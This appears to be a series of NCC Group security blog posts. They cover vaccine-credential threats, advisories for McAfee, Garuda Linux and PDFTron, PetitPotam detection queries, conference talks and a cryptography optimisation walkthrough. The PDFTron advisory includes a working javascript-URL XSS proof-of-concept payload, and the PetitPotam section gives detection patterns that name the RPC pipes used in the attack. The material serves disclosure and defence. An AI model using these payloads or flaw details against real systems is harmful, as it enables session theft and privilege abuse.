  • Privacy and recording credential verification events: A threat related to the above is privacy concerns while displaying your credential to a scanner:
    • Is the ScannerApp caching vaccine credentials or information it scans, which may be compromised in case of ScannerApp device compromise?
    • Is the ScannerApp sharing scan or credential information with third parties?
    • Is the business validating my credential using the “official” ScannerApp? Are they using their own homegrown version or a modified version to keep track of every individual accessing their space?

      Remember that these vaccine credentials are largely government-issued or verified in some manner, which means a high confidence in the name and identity of the person displaying the credential. Consider a scenario where an individual shares their vaccine credential and their driver’s license as accompanying identification to a bouncer at a bar; there isn’t a whole lot of additional information provided here, as normally they would display their driver’s license (containing their verified name and details) anyways as age verification proof. Now consider another scenario where the same credentials are needed to enter, say, Joe’s SuperMart. Normally, no identification would be provided, but now, they may be able to record the real name and age of every individual entering their physical space. This subtle increase in “surveillance” is hard to discount completely, and privacy-respecting ScannerApps will refrain from storing this information for longer than it is needed to verify the individual’s vaccination status.
  • Credential forgery and validation: How is the vaccine credential validated? Could someone create a forged credential without actually have been vaccinated and attempt to bypass checks on the ScannerApp?
    • For signed objects, things to consider include:
      • Is the cryptographic signature correctly validated with the right cipher and public key, or could someone forge credentials and bypass validation with a malformed credential?
      • Is the cipher and key size used for signatures resistant to brute force and known attacks?
      • Is the private key used to sign the object securely managed?
      • Is the public key used for verification of the signature securely distributed to the ScannerApp?
    • For credentials that use a URL/identifier to an online system, concerns include:
      • Can the connection between Scanner app and online system be intercepted?
      • Is the URL or identifier guessable or enumerable? Could someone list or find credentials in the system?

Final Thoughts

These security considerations outlined here are in no way exhaustive, and form a small but important picture of the overall concerns one would have when evaluating the security of a new public-facing health system. Hopefully this exercise helps form the basis of what to consider when using or assessing such systems. NCC Group is looking at the evolution of the systems with great interest, and plans to apply and expand on the threat model above with a look at vaccine credential systems in future posts.

Technical Advisory – NULL Pointer Derefence in McAfee Drive Encryption (CVE-2021-23893)

4 October 2021 at 15:37
Vendor: McAfee
Vendor URL: https://kc.mcafee.com/corporate/index?page=content&id=sb10361
Versions affected: Prior to 7.3.0 HF1
Systems Affected: Windows OSs without NULL page protection 
Author: Balazs Bucsay <balazs.bucsay[ at ]nccgroup[.dot.]com> @xoreipeip
CVE Identifier: CVE-2021-23893
Risk: 8.8 - CWE-269: Improper Privilege Management

Summary

McAfee’s Complete Data Protection package contained the Drive Encryption (DE) software. This software was used to transparently encrypt the drive contents. The versions prior to 7.3.0 HF1 had a vulnerability in the kernel driver MfeEpePC.sys that could be exploited on certain Windows systems for privilege escalation or DoS.

Impact

Privilege Escalation vulnerability in a Windows system driver of McAfee Drive Encryption (DE) prior to 7.3.0 could allow a local non-admin user to gain elevated system privileges via exploiting an unutilized memory buffer.

Details

The Drive Encryption software’s kernel driver was loaded to the kernel at boot time and certain IOCTLs were available for low-privileged users.

One of the available IOCTL was referencing an event that was set to NULL before initialization. In case the IOCTL was called at the right time, the procedure used NULL as an event and referenced the non-existing structure on the NULL page.

If the user mapped the NULL page and created a fake structure there that mimicked a real Even structure, it was possible to manipulate certain regions of the memory and eventually execute code in the kernel.

Recommendation

Install or update Disk Encryption 7.3.0 HF1, which has this vulnerability fixed.

Vendor Communication

February 24, 2021: Vulnerability was reported to McAfee

March 9, 2021: McAfee was able to reproduce the crash with the originally provided DoS exploit

October 1, 2021: McAfee released the new version of DE, which fixes the issue

Acknowledgements

Thanks to the Cedric Halbronn for his support during the development of the exploit.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. 

Published date:  October 4, 2021

Written by:  Balazs Bucsay

Conference Talks – October 2021

30 September 2021 at 09:15

This month, members of NCC Group will be presenting their work at the following conferences:

  • Jennifer Fernick & external panelists, “Threatscape 2023 and Beyond: AI, Deep Fakes and Other Unexpected Challenges”, to be presented at MapleSec (Oct 6 2021)
  • Damon Small, “Which security role is right for me?”, to be presented at Shellcon  (Oct 8 2021)
  • Brian Hong , “Sleight of ARM: Demystifying Intel Houdini”, to be presented at ToorCon  (Oct 12 2021)
  • Damon Small, “Beyond the Scan: The Value Proposition of Vulnerability Assessment”, to be presented at UTINFOSEC Fall 2021  (Oct 14 2021)
  • Robert Seacord, “Secure Coding in C and C++”, to be presented at NDC TechTown 2021  (October 18-19 2021)
  • Sourya Biswas, “Security from Scratch: Reminiscing Being the 2nd Security Employee at a Startup”, to be presented at InfoSec World (Oct 25 2021)

Please join us!

Threatscape 2023 and Beyond: AI, Deep Fakes and Other Unexpected Challenges
Jennifer Fernick & external panelists
MapleSec
October 6 2021

Moderator

  • Darrin Horner, Regional Sales Manager with OKTA 

Panelists

  • Jennifer Fernick, SVP & Global Head of Research, NCC Group
  •  Dr. Hadis Karimpour, Associate Professor and  Chair in Secure and Reliable Networked Engineering Systems, University of Calgary
  • Cara Wolf, CEO, Ammolite Analytx.


Which Security Role is Right for Me?
Damon Small
ShellCon
October 8 2021

Infosec is an industry of diverse professionals, and the roles available are equally diverse. Even after one decides to pursue a career in cyber security, navigating through the myriad job types that exist can be daunting. The speakers, Damon “ch3f” Small and Paul Love, will reflect on their decades of experience in the industry and offer guidance as to how a candidate can focus their job search in specific areas of infosec. From red team, to blue team, to consulting, compliance, and management, there is a role for everyone. Attendees will have ample time for Q&A after the speakers’ prepared remarks, will gain a greater understanding of professional opportunities that exist, and will learn ow to determine which type of role may be best for themselves.


Sleight of ARM: Demystifying Intel Houdini
Brian Hong 
ToorCon
October 12 2021

Infosec is an industry of diverse professionals, and the roles available are equally diverse. Even In the recent years, we have seen some of the major players in the industry switch from x86-based processors to ARM processors. Most notable is Apple, who has supported the transition to ARM from x86 with a binary translator, Rosetta 2, which has recently gotten the attention of many researchers and reverse engineers. However, you might be surprised to know that Intel has their own binary translator, Houdini, which runs ARM binaries on x86.
In this talk, we will discuss Intel’s proprietary Houdini translator, which is primarily used by Android on x86 platforms, such as higher-end Chromebooks and desktop Android emulators. We will start with a high-level discussion of how Houdini works and is loaded into processes. We will then dive into the low-level internals of the Houdini engine and memory model, including several security weaknesses it introduces into processes using it. Lastly, we will discuss methods to escape the Houdini environment, execute arbitrary ARM and x86, and write Houdini-targeted malware that bypasses existing platform analysis.

Beyond the Scan: The Value Proposition of Vulnerability Assessment
Damon Small
UTINFOSEC Fall 2021
October 14 2021

Vulnerability Assessment is, by some, regarded as one of the least “sexy” capabilities in information security. However, it is the presenter’s view that it is also a key component of any successful infosec program, and one that is often overlooked. Doing so serves an injustice to the organization and results in many missed opportunities to help ensure success in protecting critical information assets. The presenter will explore how Vulnerability Assessment can be leveraged “Beyond the Scan” and provide tangible value to not only the security team, but the entire business that it supports.

Secure Coding in C and C++
Robert Seacord
NDC TechTown 2021
October 18-19 2021

Secure Coding in C and C++ is a two day training course that provides a detailed explanation of common programming errors in C and C++ and describes how these errors can lead to code that is vulnerable to exploitation.

Security from Scratch: Reminiscing Being the 2nd Security Employee at a Startup
Sourya Biswas    
InfoSec World
October 25 2021

What happens when a small company equipped with the brand new security program you built suddenly becomes a not-so-small company successful enough to be targeted by cyber attacks? This case study will outline the security roll-out at a startup and reveal how they remained result-oriented even on a small budget. Attendees will leave with recommendations that have since been successfully implemented by multiple other lean startups, and applicable to anyone tasked with building or rebuilding enterprise cybersecurity, or working with limited funding.

Key Takeaways:

  • Understand the thought process of a new CISO at a company without a security program.    
  • Realize what a startup’s Board typically looks for in a new security program.
  • Understand how Defense in Depth is a viable approach towards implementing security from scratch.
  • Learn about some common gaps encountered assessing startups’ security postures.

Technical Advisory – Garuda Linux Insecure User Creation (CVE-2021-3784)

29 September 2021 at 15:39
Vendor: Garuda Linux
Vendor URL: https://garudalinux.org/ 
Versions affected: previous commit 29b03856
Systems Affected: Garuda Linux user creation panel 
Author: Jesus Olmos <jesus.olmos[at]fox-it[dot]com>
CVE Identifier: CVE-2021-3784
Risk: 4.4 - Local user impersonation in the moment of the user creation

Summary

Garuda is a modern Linux distribution based on Arch Linux with nice blur effects and icons. 

Garuda Linux performs an insecure user creation and authentication, that allows a local attacker  to impersonate a user account while it is being created. 

The user is created in two steps: 

  • First the user is created without password and without any account lock. 
  • Then the password is set. 

An authentication is requested in every step, so there is enough of a delay between steps to get access on the unprotected account. 

Furthermore, the switch-user option allows to access to the unprotected account using any random password. 

Impact

A local attacker can detect a user creation and install a backdoor to access that user account at any moment in the future. 

Details

Garuda Linux performs an insecure user creation and authentication, that allows any user to impersonate the created account with Garuda’s user management panel: 

“garuda settings manager” > “user accounts” 

In Linux often the users are created in two steps: 

  • Create the user without password but the account locked 
  • Set the password 

But in the case of Garuda there is no account lock, this is the code for step1: 

args[“arguments”] = QStringList() << “-m” << “-p” << “” << “-U” << “-G” << defaultUserGroups << username; 
installActionAdd.setArguments(args); 
KAuth::ExecuteJob* jobAdd = installActionAdd.execute(); 

This step generates an authentication pop-up, and so does the step2 when the password is set: 

args[“arguments”] = QStringList() << username; 
args[“writeArgs”] = QStringList() << password << password; 
installActionUsersChangePassword.setArguments( args ); 
KAuth::ExecuteJob* jobChangePassword = installActionUsersChangePassword.execute() 

Each KAuth is doing an elevation and showing the authentication-popup, so it appears twice in the practice. 

Between step1 and step2 the user is created without password and without account lock: 

  • shadow:   myuser::18841:0:99999:7:: 
  • passwd:   myuser:x:1003:1004::/home/myuser:/bin/bash 

Despite this momentary insecure state of the created user, the configuration in Garuda doesn’t allow using command “su” to an account that doesn’t have a password. 

But the Garuda switch-user authenticates well on this user with any random password. 

Recommendation

The current download version is fixed, and also an upgrade is available. Users are recommended to upgrade to the most recent version.

In case of doubt, don’t use the Garuda’s users creation panel; the users can be created using the console. 

Vendor Communication

August 9 2021:  The vulnerability was discovered during vacation. 

September 10 2021:  A ticket is created on vendor’s gitlab. 

September 10 2021: The vulnerability is fixed in commit 29b03856

Acknowledgements

Thanks to the Garuda developers for quickly fixing the vulnerability. 

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. 

Published date:  September 29 2021

Written by:  Jesus Olmos 

Detecting and Hunting for the PetitPotam NTLM Relay Attack

23 September 2021 at 18:34

Overview

During the week of July 19th, 2021, information security researchers published a proof of concept tool named “PetitPotam” that exploits a flaw in Microsoft Windows Active Directory Certificate Servers with an NTLM relay attack.  The flaw allows an attacker to gain administrative privileges of an Active Directory Certificate Server once on the network with another exploit or malware infecting a system.  

The following details are provided to assist organizations in detecting and threat hunting for this and other similar types of threats.

Preparation

The default settings of Windows logging do not often catch advanced threats.  Therefore, Windows Advanced Audit Logging must be optimally configured to detect and to be able to threat hunt PetitPotam and similar attacks.

Organizations should have a standard procedure to configure the Windows Advanced Audit Policies as a part of a complete security program and have each Windows system collect locally significant events.  NCC Group recommends using the following resource to configure Windows Advanced Audit Policies:

Log rotation can be another major issue with Windows default log settings.  Both the default log size should be increased to support detection engineering and threat hunting.

Ideally, organizations should forward event logs to a log management or SIEM solution to operationalize detection alerts and provide a central console where threat hunting can be performed.  Alternatively, with optimally configured log sizes, teams can run tools such as PowerShell or LOG-MD to hunt for malicious activity against the local log data.

Detecting and Threat Hunting NTLM Relay Attacks

The PetitPotam attack targets Active Directory servers running certificate services, so this will be the focus of the detection and hunting.  Event log data is needed to detect or hunt for PetitPotam. The following settings and events can be used to detect this malicious activity:

Malicious Logins

PetitPotam will generate an odd login that can be used to detect and hunt for indications of execution.  To collect Event ID 4624, the Windows Advanced Audit Policy will need to have the following policy enabled:

  • Logon/Logoff – Audit Logon = Success and Failure

The following query logic can be used:

  • Event Log = Security
  • Event ID = 4624
  • User = ANONYMOUS LOGON
  • Authentication Package Name = NTLM*
  • Elevated Token – *1842

Sample Query

The following query is based on Elastic’s WinLogBeat version 7 agent.

  • “event.code”=”4624″ and winlog.event_data.AuthenticationPackageName=”NTLM*” and winlog.event_data.ElevatedToken=”*1842″ | PackageName:=winlog.event_data.AuthenticationPackageName | Token:=winlog.event_data.ElevatedToken | WS_Name:=winlog.event_data.WorkstationName | LogonProcess:=winlog.event_data.LogonProcessName | LogonType:=winlog.event_data.LogonType | ProcessName:=winlog.event_data.ProcessName | UserName:=winlog.event_data.SubjectUserName | Domain:=winlog.event_data.SubjectDomainName | TargetDomain:=winlog.event_data.TargetDomainName | TargetUser:=winlog.event_data.TargetUserName | Task:=winlog.event_data.TargetUserName| table([event.code, @timestamp, host.name, event.outcome, WS_Name, UserName, Domain, Token, PackageName, LogonProcess, LogonType, ProcessName, TargetDomain, TargetUser, Task])

Malicious Share Access

PetitPotam will generate odd network share connections that can be used to detect and hunt for indications of execution.  To collect Event ID 5145, the Windows Advanced Audit Policy will need to have the following policy enabled:

  • Object Access – Audit Detailed File Share = Success
  • Object Access – File Share = Success

The following query logic can be used:

  • Event Log = Security
  • Event ID = 5145
  • Object Name = *IPC*
  • Target Name = (“lsarpc” or “efsrpc” or “lsass” or “samr” or “netlogon”

Sample Query

The following query is based on Elastic’s WinLogBeat version 7 agent.

  • “event.code”=”5145” and winlog.event_data.ShareName=*IPC* and (“lsarpc” or “efsrpc” or “lsass” or “samr” or “netlogon” or “srvsvc”)
    | Status:= keywords[0] | Src_IP:= winlog.event_data.IpAddress | PID:= winlog.process.pid | UserName:=winlog.event_data.SubjectUserName | Domain:= winlog.event_data.SubjectDomainName | Target_File:= winlog.event_data.RelativeTargetName | Path:= winlog.event_data.ShareLocalPath | Share:= winlog.event_data.ShareName | ObjectType:=winlog.event_data.ObjectType
    | table([event.code, @timestamp, host.name, Status, Src_IP, PID, UserName, Domain, task, Path, Share, Target_File, ObjectType])

If you find any false positives, validating them and excluding or refining the query may be needed.  We hope this information can assist your detection and threat hunting efforts to detect this and similar types of attacks.

Additional Reading and Resources

Technical Advisory: PDFTron JavaScript URLs Allowed in WebViewer UI (CVE-2021-39307)

14 September 2021 at 13:52
Vendor: PDFTron
Vendor URL: https://www.pdftron.com/
Versions affected: WebViewer UI 8.0 or below
Systems Affected: Web applications hosting the affected software
Author: Liyun Li <liyun.li[at]nccgroup[dot]com>
CVE Identifier: CVE-2021-39307

Summary

PDFTron’s WebViewer UI 8.0 or below renders dangerous URLs as hyperlinks in supported documents, including JavaScript URLs, allowing the execution of arbitrary JavaScript code.

Impact

An attacker could steal a victim’s session tokens, log their keystrokes, steal private data, or perform privileged actions in the context of a victim’s session.

Details

JavaScript URLs are dangerous because they can be used to execute arbitrary JavaScript code when visited. Built-in PDF readers in modern browsers, such as Mozilla’s pdf.js, do not render code-execution-capable URLs as hyperlinks to avoid this issue.

To reproduce this issue, first create the following HTML document and save the rendered content as PDF on a modern browser.

<h2><a href="javascript:document.write`
  <div>
    <form method='GET' action='https://nccgroup.com'>
      <input type='submit' value='NCC Group'>
    </form>
    <script>alert(document.domain)</script>
  </div>
`">Click me</a></h2>

After that, use the “d” parameter to include the uploaded PDF file (e.g. http://webviewer-instance/#d=https://domain.tld/test.pdf).

Support for rendering clickable JavaScript and Data URL should be removed.

Recommendation to Users

Upgrade WebViewer UI to 8.1, available at https://www.pdftron.com/documentation/web/download.

Vendor Communication

2021-08-16: Issue reported to PDFTron
2021-08-17: PDFTron confirmed the vulnerability
2021-08-23: PDFTron issued patch to nightly build
2021-09-09: PDFTron WebViewer 8.1 released 
2021-09-14: Advisory released by NCC Group

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  September 14, 2021

Written by:  Liyun Li

Optimizing Pairing-Based Cryptography: Montgomery Multiplication in Assembly

10 September 2021 at 08:30

This is the second blog post in a new code-centric series about selected optimizations found in pairing-based cryptography. Pairing operations are foundational to the BLS Signatures central to Ethereum 2.0, the zero-knowledge arguments underpinning Filecoin, and a wide variety of other emerging applications.

While my prior blog series, “Pairing over BLS12-381,” implemented the entire pairing operation from start to finish in roughly 200 lines of high-level Haskell, this current blog series, “Optimizing Pairing-Based Cryptography” looks at lower-level performance optimizations in more operational systems. The first post in this series covered modular Montgomery arithmetic in Rust from start to finish. This second post takes the Montgomery multiplication algorithm developed in Rust even further to seek the maximum performance a modern x86-64 machine can deliver from an implementation hand-written in assembly language. Several specialized instructions and advanced micro-architectural features enabling increased parallelism result in a Montgomery multiplication routine running more than 15X faster than a generic Big Integer implementation.

Overview

Pairing-based cryptography is fascinating because it utilizes such a wide variety of concepts, algorithms, techniques and optimizations. For reference, the big picture on pairing can be reviewed in the prior series of blog posts listed below.

Pairing over BLS12-381, Part 1: Fields
Pairing over BLS12-381, Part 2: Curves
Pairing over BLS12-381, Part 3: Pairing!

This current blog post focuses on optimizing the most expensive of basic field arithmetic operations: modular multiplication. First, a reference function implemented in Rust with the BigUint library crate is presented alongside a similar reference function adapted for use with Montgomery-form operands. Second, a more optimized routine utilizing operands constructed solely from 64-bit unsigned integers and developed in the prior blog post is presented – this serves as the jumping-off point for assembly language optimization. Third, the complete assembly routine is developed and described with interspersed insights on CPU architecture, micro-architecture, and register allocation. This post then wraps up with some figure of-merit benchmarking results that compare the various implementations.

All of the code is available, ready-to-run and ready-to-modify for your own experimentation. The code is nicely self-contained and understandable, with zero functional dependencies and minimal test/build complexity. On Ubuntu 20.04 with Rust, git and clang preinstalled, it is as simple as:

$ git clone https://github.com/nccgroup/pairing.git
$ cd pairing/mont2
$ RUSTFLAGS="--emit asm -C target-cpu=native" cargo bench

The Reference Operations

Rust, along with the BigUint library crate, makes the basic modular multiplication operation exceptionally easy to code. The excerpt below defines the BLS12-381 prime field modulus with the lazy_static macro and then proceeds to implement the modular multiplication function mul_biguint() using that fixed modulus. This reference function corresponds to the modular multiplication performance a generic application might achieve, and is used later as the benchmark baseline. [Code excerpt on GitHub]

As described in the prior blog post, the Montgomery multiplication algorithm has a lot more potential for performance optimization but uses operands in the Montgomery form ã = a · R mod N, where a is the normal value (or normal form), N is the MODULUS and R is 2384 in our scenario. When operands in Montgomery form are multiplied together, an instance of R−1 needs to be factored into the calculation in order to maintain the result in correct Montgomery form. Thus, the actual operation is mont_mul(ã, b̃) = ã · b̃ · R−1 mod N. The code below declares the R−1 = R_INV constant as calculated in the prior blog post, utilizes the same MODULUS constant declared above, and so implements our mont_mul_biguint() Montgomery multiplication reference function. [Code excerpt on GitHub]

Note that the above function currently has even worse performance characteristics than the prior baseline. This is due to the additional multiplication involving R_INV delivering an even larger input to the very expensive modular reduction operator which involves a division operation. However, it can serve as a more formalized definition of correct functionality, so it will be used internally to support the test code which compares actual versus expected results across different implementations. As an aside, recall that the extra expense of converting the operands to/from Montgomery form is expected to be amortized across many (hopefully now much faster) interim operations.

Montgomery Multiplication Using Rust’s Built-In Types

The primary issue with each of the above multiplication routines is the expensive division lurking underneath the modulo operator. The BigUint crate is wonderful in that it supports both arbitrary precision operands and moduli. However, this flexibility precludes some of the aggressive performance optimizations that can be implemented with fixed-size operands and a constant modulus.

The Rust code shown below from the prior blog post introduces the fixed data structure used for the operands. Operands consist of an array of six 64-bit unsigned integers, each known as a limb. This is followed by the ‘magic constant’ N_PRIME derived in the prior blog post for use in the reduction step, and then the complete Montgomery multiplication function using only Rust’s built-in operators and data types. [Code excerpt on GitHub]

There are three interesting and related things to observe in the code above.

  1. A temp array is declared on line 107 that is capable of holding twelve 64-bit limbs. Intuitively, that size makes sense since the overall operation involves a multiplication of two operands, where each operand consists of six 64-bit limbs, so a ‘double-width’ intermediate result is appropriate.
  2. The outer loop wraps a partial product step in the first inner loop followed by a reduction step in the second inner loop, and the outer loop index i always acts as a base address whenever the temp array is accessed. Looking more closely at the logic executed during each outer loop iteration, only seven limbs of the temp array are ever active, which is a noticeably smaller working set relative to the overall size of twelve in the temp declaration.
  3. As the outer loop iterates, the code essentially steps forward through the working set of the temp array from least significant toward most significant limb, never going fully backwards. In fact, incrementing the loop index i and using it as a base address means the least significant values are effectively falling away one at a time; the final result is derived from only the most significant six limbs of the temp array.

These three observations suggest that it is possible to elegantly implement the work done inside the outer loop within only a handful of active registers. The outer loop can then either iterate as shown or be unrolled, while it shifts the working set one step forward through the temp array each time.

An Aside: CPU Architecture, Micro-architecture, and Register Allocation

Some basic foundation needs to be built prior to jumping into the assembly language implementation. While the term ‘CPU Architecture’ does not have a single, simple or perfectly agreed-upon definition, in this context it describes the higher-level software instruction set and programming model of a processor system – the programmer’s view. At a lower level, the term ‘CPU Micro-architecture’ then describes how a specific processor implementation is logically organized to execute that instruction set – these underlying mechanisms are largely hidden from the application programmer. Both areas have seen tremendous progress and greater complexity over time in the never ending quest for performance that largely comes from increased parallelism. There are a few things to observe for each topic, starting from the lower-level and working upwards.

CPU Micro-architecture

A view into the micro-architecture of Intel’s Core2 machine is shown below. While that machine is over a decade old, the diagram remains very instructive and more modern versions have similar structure with greatly increased capacities. The assembly code we soon develop should run well on all modern Intel and AMD x86-64 processors shipped within the past 5 years (at least).

https://commons.wikimedia.org/w/index.php?curid=2541872 CC BY-SA 3.0

There are four interesting things to observe in the diagram above.

  1. The (pink) instruction fetch logic is capable of supplying six instructions from the fetch buffer to the instruction queue per cycle. Clearly the intent is to keep the multiple parallel execution units downstream (described next) stuffed full of work.
  2. The (yellow) execution units are capable of executing multiple similar and dissimilar operations in parallel. The configuration is intended to support many simple and frequent operations separately from the fewer, more complex and rarer operations. The various operations will clearly involve very different throughput and latency characteristics.
  3. The (salmon) reservation station helps manage the operand dependencies between instructions, and the register alias table allows for more physical registers than logical registers. The adjacent reorder buffer and retirement register file logic allows instructions to execute out-of-order but get committed in-order. While humans typically think in a nice orderly step-by-step fashion, the actual instruction execution patterns can go wildly out-of-order (provided they are ultimately finalized in-order).
  4. While the specific individual pipeline stages are not shown, modern processors have very deep pipelines and thus require extensive branch prediction logic to minimize overhead from mispredictions. This is pertinent to unrolling small loops.

The four items above allow the processor to extract a large amount of the underlying instruction-level parallelism throughout each of the fetch, decode, execute and finalize/retire steps. It is quite fantastic that all of this complexity is effectively hidden from the application programmer. A bigger, better and newer micro-architecture should simply result in better performance on strictly unchanged code.

CPU Architecture

In some cases, specialized instructions are added to the programming model that provide significant speed-up for very specific algorithms. While many people first think of the very well-known ‘Intel MMX instructions for multimedia algorithms’, there have been many other less prominent instances over the years. Intel’s ADX (Multi-Precision Add-Carry Instruction Extensions) feature provides two new addition instructions that can help increase the performance of arbitrary precision arithmetic. Intel’s BMI2 (Bit Manipulation Instruction Set 2) feature contains a new flag-friendly multiplication instruction among several others not relevant to our purpose. Processors supporting these feature extensions have been shipping since roughly 2015, and may offer a significant performance benefit.

The ‘native’ Montgomery multiplication Rust code last shown above involved a large amount of addition operations (outside of the array index calculation) centered around lines 112-114, 118, 124-125 and 129. These operations are building larger-precision results (e.g., a full partial product) from smaller-precision instructions (e.g., a 64-bit add). Normally, a series of ‘Add with carry’ (ADC) instructions are used that add two operands and the carry(in) flag to produce a sum and a new carry(out) flag. The instructions are ordered to work on the least-to-most significant operand limb one at a time. The dependence upon a single carry flag presents a bottleneck that allows just one chain to operate at a time in principle, thus limiting parallelism.

Intel realized the limitation of a single carry flag, and introduced two instructions that effectively use different carry flags. This allows the programmer to express more instruction-level parallelism by describing two chains that can be operating at the same time. The ADX instruction extensions provide:

  • ADCX Adds two 64-bit unsigned integer operands plus the carry flag and produces a 64-bit unsigned integer result with the carry out value set in the carry flag. This does not affect any other flags (as the prior ADD instructions did).
  • ADOX Adds two 64-bit unsigned integer operands plus the overflow flag and produces a 64-bit unsigned integer result with the carry out value set in the overflow flag. This does not affect any other flags. Note that ordinarily the overflow flag is used with signed arithmetic.

Meanwhile, the Rust code also contains a significant amount of multiplication operations interspersed amongst the addition operations noted above. The ordinary MUL instruction multiplies two 64-bit unsigned integer operands to produce a 128-bit result placed into two destination registers. However, this result also affects the carry and overflow flags – meaning it will interfere with our ADCX and ADOX carry chains. Furthermore, the output registers must be %rax and %rdx which limits flexibility and constrains register allocation. To address this, the BMI2 instruction extensions include:

  • MULX Multiplies two 64-bit unsigned integer operands and produces an unsigned 128-bit integer result stored into two destination registers. The flags are not read nor written, thus enabling the interleaving of add-with-carry operations and multiplications.

The two new addition instructions inherently overwrite one of the source registers with the destination result. In other words, adcxq %rax, %r10 will add %rax to %r10 with the carry flag, and place the result into %r10 and the carry flag. The new multiplication instruction requires one of its source operands to always be in %rdx. In other words, mulxq %rsi, %rax, %rbx is the multiplication of %rsi by %rdx with the lower half of the result written into %rax and the upper half written into %rbx. The q suffix on each instruction is simply the quadword suffix syntax of the GNU Assembler.

Register Allocation

The three new instructions described above will form the core of the Montgomery multiplication function in assembly. Since the x86 instruction set is rather register constrained, a strategy that minimizes the actual working set of active values must be developed. We saw earlier how only seven limbs of temp are in play at any one time and the outer loop index i formed a base address when accessing temp. Consider a ‘middle’ iteration of the outer loop, as the simpler first iteration can be derived from this. This flattened iteration is implemented as an assembler macro that can be later placed singly inside an outer loop or in multiple back-to-back instances that unroll the outer loop.

The first inner loop calculating the partial product will be unrolled and assumes temp[i + 0..6] (exclusive) arrives in registers %r10 through %r15. The %rax and %rbx registers will temporarily hold multiplication results as we step through a.v[0..6] * b.v[i] (with a fixed i). The a.v[0..6] (exclusive) operands will involve a relative address using %rsi as the base, while the fixed operand will be held in %rdx. At the end of the inner loop, the %rbp register will be used to hold temp[i + 6].

The second inner loop implementing the reduction step will also be unrolled and assumes temp[i + 0..7] (exclusive) is provided in the registers %r10 through %r15 along with %rbp. The register strategy for holding the multiplication results is modified slightly here due to A) the add instruction requiring a source operand being overwritten by the result, and B) the calculation process effectively shifts the working set to the right by one step (thus the least significant value will drop away, but its carry out will still propagate).

Basic Register Allocation Structure/Plan

The general plan for register allocation within one ‘middle’ iteration of the outer loop is shown above in simplified fashion. The upper crimson triangle implements the partial product inner loop and is executed first. The lower green triangle implements the reduction step and executes second. Double-width boxes hold the multiplication results, and the red/green arrows identify the two separate carry chains of the addition instructions. The nearly side-by-side placement of the addition operations is meant to hint at their parallel operation. While things visually appear to step forward in a nice orderly single-cycle progression, multiplication latencies are significantly higher than addition so the out-of-order capabilities of the micro-architecture is crucial to performance. The output data within %r10 through %r15 is compatible with input data within %r10 through %r15, so instances of this block can be repeated one after another.

The initial iteration of the outer loop is a simplification of that shown above. Simply assume %r10 through %r15 start at zero and remove everything no longer needed.

Montgomery Multiplication in Assembly

The bulk of the hard work has now been done. A macro implementing one iteration of the outer loop in x86-64 assembly is shown below. The fully unrolled outer loop is implemented with a simplified initial instance followed by five back-to-back instantiations of this code. [Code excerpt on GitHub]

The final Montgomery multiplication function is fully implemented in src/mont_mul_asm.S and is a straightforward concatenation of the following elements:

  1. A function label attached to the prologue. Any registers used by the function that are required to be preserved across function calls must be pushed to the stack prior to use. The label corresponds to the extern “C” clause in the Rust lib.rs source file.
  2. The MODULUS is stored as quadword constants and their address loaded into the %rcx register. These values are utilized in the reduction step.
  3. An instance of the simplified first outer loop.
  4. Five instances of the macro shown above. Note the presence of offset parameter on line 82. This is used to form an index into b.v[i] on line 84 and it is increased by 8 on each instance.
  5. The final modulus correction logic is virtually identical to what has already been seen for addition: subtract the modulus from the initial result and return that if there is no borrow, otherwise return the initial result.
  6. A function epilogue that pops the registers from the stack that were pushed there in the prologue.

Again, the full routine can be seen in its totality here on GitHub. Note that the Rust build.rs source file integrates everything with cargo such that there are no additional steps required to build.

A final aside: Unrolling Rust and intrinsics

The code repository already fully supports further experimentation with A) flattened Rust code that uses the same strategy to minimize its active working set, and B) Rust intrinsics. Let’s briefly touch on both topics before including them in the benchmarking results described next.

The assembly code can be back-ported or re-implemented back into flat/raw Rust with the same ‘register allocation’ strategy to manage the active working set and avoid declaring a temp[] array. This gives surprisingly good results and suggests that a modern micro-architecture can look even further ahead, perhaps up to 200 (simple) instructions, to extract more instruction level parallelism from separate but adjacent carry chains. Hence the old adage: “You can rarely outsmart the compiler”. Look for the fe_mont_mul_raw() function.

Alternatively, Rust provides intrinsics that specifically target the ADCX, ADOX and MULX instructions. Unfortunately, the toolchain cannot emit the first two yet. Nonetheless, the fe_mont_mul_intrinsics() function shows exactly how this is coded. The MULX instruction is indeed emitted and does deliver a significant benefit by not interfering with the flags.

Benchmarking

Everything is ready to go – let’s benchmark! Here are sample results from my machine:

$ RUSTFLAGS="--emit asm -C target-cpu=native" cargo bench
Ubuntu 20.04.2 LTS on Intel Core i7-7700K CPU @ 4.20GHz with Rust version 1.53

1. Addition X 1000 iterations                                       [3.6837 us 3.6870 us 3.6905 us]
2. Subtraction X 1000 iterations                                  [3.1241 us 3.1242 us 3.1244 us]
3. Multiplication by BigUint X 1000 iterations:            [517.54 us 517.68 us 517.85 us]
4. Multiplication in Rust (mont1 blog) X 1000 iter:     [46.037 us 46.049 us 46.064 us]
5. Multiplication in flat Rust X 1000 iterations:           [34.719 us 34.741 us 34.763 us]
6. Multiplication in Rust with intrinsics X 1000 iter:    [31.497 us 31.498 us 31.500 us]
7. Multiplication in Rust with assembly X 1000 iter:    [29.573 us 29.576 us 29.580 us]

There are three caveats to consider while interpreting the above results. First and foremost, consider these results as a qualitative sample rather than a definitive result. Second, each result is presented as minimum, nominal and maximum timing – so the key figure is the central number. Finally, each function is timed across 1000 iterations, so the timing result for a single iteration correspond to units of nanoseconds rather than microseconds. On this machine, the Montgomery multiplication function written in assembly language takes approximately 29.576 ns.

